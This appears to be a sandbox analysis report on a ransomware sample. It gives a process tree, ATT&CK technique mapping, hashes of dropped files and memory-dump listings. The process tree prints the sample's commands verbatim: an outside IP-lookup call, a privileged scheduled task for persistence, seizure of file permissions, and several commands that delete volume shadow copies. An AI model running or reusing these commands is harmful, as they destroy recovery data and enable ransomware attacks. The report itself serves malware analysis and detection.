  "C:\Users\Admin\AppData\Local\Temp\NWpUUoXa.exe" -n
  2⤵
  - Executes dropped EXE
  PID:4288
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\UFrt0rZT.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5072
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1636
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\u5mj7pqS.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:536
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\u5mj7pqS.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:3544
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\lyuA76ln.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2024
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\lyuA76ln.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:5664
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5168
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:5668
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\SLqXTAxH.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3944
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\SLqXTAxH.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:4272
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:1220
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:4848
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eqfnvbJW.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1884
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
    3⤵
    - Views/modifies file attributes
    PID:5788
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
    3⤵
    PID:1620
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c deNx4JD3.exe -accepteula "store.db" -nobanner
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5448
  - - C:\Users\Admin\AppData\Local\Temp\deNx4JD3.exe
      deNx4JD3.exe -accepteula "store.db" -nobanner
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:5356
    - - C:\Users\Admin\AppData\Local\Temp\deNx4JD364.exe
        
        deNx4JD3.exe -accepteula "store.db" -nobanner
        5⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:5372

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\lyuA76ln.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3852
- C:\Windows\system32\vssadmin.exe
  vssadmin Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:6496
- C:\Windows\System32\Wbem\WMIC.exe
  wmic SHADOWCOPY DELETE
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:6288
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}
  2⤵
  PID:5772

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5456

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\#FOX_README#.rtf

Filesize
8KB

MD5
e5720e85c0334d00409489fcf02415e1

SHA1
559cef48e61847b2963910fe2cd508ecdcad8d90

SHA256
59df2d7061ab9040b0ed74167608961ebcd62e9735215994e97a7cc1d217a84d

SHA512
6e7508246c44b785a7c45fdcca9c53790ad2c70d74bcdc9429cc6105a78471930792cb84aeaaf9384f1d70fe8702d614aaa9f6b9f64d0a80547b9f543cbe4b60

Download Submit
C:\Users\Admin\AppData\Local\Temp\NWpUUoXa.exe

Filesize
1.2MB

MD5
76b640aa00354e46b29ca7ac2adfd732

SHA1
afebf9d72ba7186afefebf4deda87675621b0b8b

SHA256
0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7

SHA512
fecb15238714c786098f1dd0bb18696ab15634228ec3a48c900fd843e817d4c24607bdf6fb58e0321da3e1c1e49305ec919dddabbd34727acec8fbd6cb6fd552

Download Submit
C:\Users\Admin\AppData\Local\Temp\NWpUUoXa.exe

Filesize
1.2MB

MD5
76b640aa00354e46b29ca7ac2adfd732

SHA1
afebf9d72ba7186afefebf4deda87675621b0b8b

SHA256
0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7

SHA512
fecb15238714c786098f1dd0bb18696ab15634228ec3a48c900fd843e817d4c24607bdf6fb58e0321da3e1c1e49305ec919dddabbd34727acec8fbd6cb6fd552

Download Submit
C:\Users\Admin\AppData\Local\Temp\NWpUUoXa.exe

Filesize
1.2MB

MD5
76b640aa00354e46b29ca7ac2adfd732

SHA1
afebf9d72ba7186afefebf4deda87675621b0b8b

SHA256
0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7

SHA512
fecb15238714c786098f1dd0bb18696ab15634228ec3a48c900fd843e817d4c24607bdf6fb58e0321da3e1c1e49305ec919dddabbd34727acec8fbd6cb6fd552

Download Submit
C:\Users\Admin\AppData\Local\Temp\UFrt0rZT.txt

Filesize
14B

MD5
8eb51985066cb0782077f624013d47a2

SHA1
0549d07d51454e73b937946ba1887cacfce71835

SHA256
5537d10911f09132033b185344f75ea1a0ed7e5509b3be00bd8bc93d477baa44

SHA512
539a7160bb41366a74d8859b080724f5838132428f672c2bba7ef9c9a259823f15074adec75567bea6724f09d681c04b8763a2f495eff3436ff17420cb7bf0f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dzzp2jw0.4xe.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\deNx4JD3.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\deNx4JD3.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\deNx4JD364.exe

Filesize
221KB

MD5
3026bc2448763d5a9862d864b97288ff

SHA1
7d93a18713ece2e7b93e453739ffd7ad0c646e9e

SHA256
7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

SHA512
d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Download Submit
C:\Users\Admin\AppData\Local\Temp\deNx4JD364.exe

Filesize
221KB

MD5
3026bc2448763d5a9862d864b97288ff

SHA1
7d93a18713ece2e7b93e453739ffd7ad0c646e9e

SHA256
7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

SHA512
d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Download Submit
C:\Users\Admin\AppData\Local\Temp\elog_4A73C9FA04A3D7DE.txt

Filesize
11KB

MD5
aad8088e049bce8d5ede9ba75457a29b

SHA1
4f153e7744bdb8cb43f90d77cf3558680d4d4885

SHA256
da0b63266e25798dd4d2f34dddb675f6ce8669aef1993faf8daf03525fa53ee0

SHA512
808879b34453d1217f3a870e681eee32def71a26d96c28425f764b69c5b0f27714c495b37747e9224bd8185f21ff6402dce04140b8108087b570006eb35435e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\elog_4A73C9FA04A3D7DE.txt

Filesize
313B

MD5
decadd863140ac6096da1d75ebaf62fd

SHA1
fefc860477557bbb154c4675545079cc188c05ba

SHA256
b9548694825ae74f94db4c036d82c3d319a0e87897b8379d7ff136752933e1f9

SHA512
b1bf26cf037586a62d4cc7f01f2c5eeb37d22ca813dd9ba6962d032384fdbf29295fc3e0e687fa598b7296a1ef0c07ed5f177d5fb37878721076807cd5384ab7

Download Submit
C:\Users\Admin\AppData\Local\Temp\elog_4A73C9FA04A3D7DE.txt

Filesize
453B

MD5
02b75312940c939da94d2cd14e149e03

SHA1
2e1e62915e62bb2ae5ddeb2b4d6d5074e432061b

SHA256
304ed98edcbea5c044783653506473ae4b9caa9ab8172cf9227744a34c45da88

SHA512
e4e6021177c582705eed75334d617a7fddf65a1e62102b210c56bf7404a40b232da0317e757f5029d7d30463cb598a62f2558f541d06dafa25e5f6e6c60f6a2d

Download Submit
C:\Users\Admin\AppData\Local\Temp\eqfnvbJW.bat

Filesize
246B

MD5
6d4f752d230ddbc7994c29932229f24f

SHA1
8e7c693071b83fe35708120f0da2224fc206e05e

SHA256
98c94d0f9f2c044c27596af4a614eddb1eb84fbf7df027947e5f7d1b4451cc92

SHA512
a6cc14df3ad5ed5cba0d8a5532af5584b0fac998408fe0c01aa787c2a90af052b724496585a783326867dd7ae8265c7d66c845855bc003e21c13bc0aa9e23a15

Download Submit
C:\Users\Admin\AppData\Roaming\lyuA76ln.bat

Filesize
415B

MD5
57bf19031b901feb10fcf3b0cf60813d

SHA1
19a4decb700557f08b5ea4b55377d7f368f48320

SHA256
14cae52128179d2ac677bf36be68934a1371015ba2608be2abb76babdcc3c107

SHA512
f6b6ccd68c1e531159083846fb61e6ac5ef65c815cce7754d0d9376f0d22c19dc962dd17ec10e7ac34e8d73bee2907fa2e7cfb9bdc4232ec7d7a00a7698e332b

Download Submit
C:\Users\Admin\AppData\Roaming\u5mj7pqS.vbs

Filesize
260B

MD5
9770d9f4d69d7bf088bf324bad7a252b

SHA1
85723b29aa7381790db5c599e9020086ff0cc887

SHA256
dc433118017997f97ac70338d340261c43fc5b65a5a9f5c6270aa856cc325f7c

SHA512
c035932f8db6fc3f0479b03f1eb57b5f4af30bc022544f0a16ccfbf56a475c7e266b580e75f0e1927e92f988d204bf7994f06c2d49c49b0aea14de620cf3e044

Download Submit
memory/1348-5196-0x0000000000400000-0x0000000000538000-memory.dmp

Filesize
1.2MB

Download
memory/1348-8338-0x0000000000400000-0x0000000000538000-memory.dmp

Filesize
1.2MB

Download
memory/1348-16627-0x0000000000400000-0x0000000000538000-memory.dmp

Filesize
1.2MB

Download
memory/1348-140-0x0000000000400000-0x0000000000538000-memory.dmp

Filesize
1.2MB

Download
memory/1348-16578-0x0000000000400000-0x0000000000538000-memory.dmp

Filesize
1.2MB

Download
memory/1348-943-0x0000000000400000-0x0000000000538000-memory.dmp

Filesize
1.2MB

Download
memory/1348-9793-0x0000000000400000-0x0000000000538000-memory.dmp

Filesize
1.2MB

Download
memory/1348-13419-0x0000000000400000-0x0000000000538000-memory.dmp

Filesize
1.2MB

Download
memory/1636-147-0x0000000005590000-0x00000000055F6000-memory.dmp

Filesize
408KB

Download
memory/1636-148-0x0000000005600000-0x0000000005666000-memory.dmp

Filesize
408KB

Download
memory/1636-164-0x00000000745F0000-0x0000000074DA0000-memory.dmp

Filesize
7.7MB

Download
memory/1636-161-0x0000000006170000-0x000000000618A000-memory.dmp

Filesize
104KB

Download
memory/1636-160-0x00000000074E0000-0x0000000007B5A000-memory.dmp

Filesize
6.5MB

Download
memory/1636-159-0x00000000022F0000-0x0000000002300000-memory.dmp

Filesize
64KB

Download
memory/1636-141-0x00000000745F0000-0x0000000074DA0000-memory.dmp

Filesize
7.7MB

Download
memory/1636-142-0x00000000022F0000-0x0000000002300000-memory.dmp

Filesize
64KB

Download
memory/1636-158-0x0000000005C80000-0x0000000005C9E000-memory.dmp

Filesize
120KB

Download
memory/1636-143-0x0000000002340000-0x0000000002376000-memory.dmp

Filesize
216KB

Download
memory/1636-146-0x0000000004C90000-0x0000000004CB2000-memory.dmp

Filesize
136KB

Download
memory/1636-144-0x0000000004DB0000-0x00000000053D8000-memory.dmp

Filesize
6.2MB

Download
memory/4288-145-0x0000000000400000-0x0000000000538000-memory.dmp

Filesize
1.2MB

Download
memory/4288-14407-0x0000000000400000-0x0000000000538000-memory.dmp

Filesize
1.2MB

Download
memory/4288-6088-0x0000000000400000-0x0000000000538000-memory.dmp

Filesize
1.2MB

Download
memory/5356-2322-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5356-7150-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download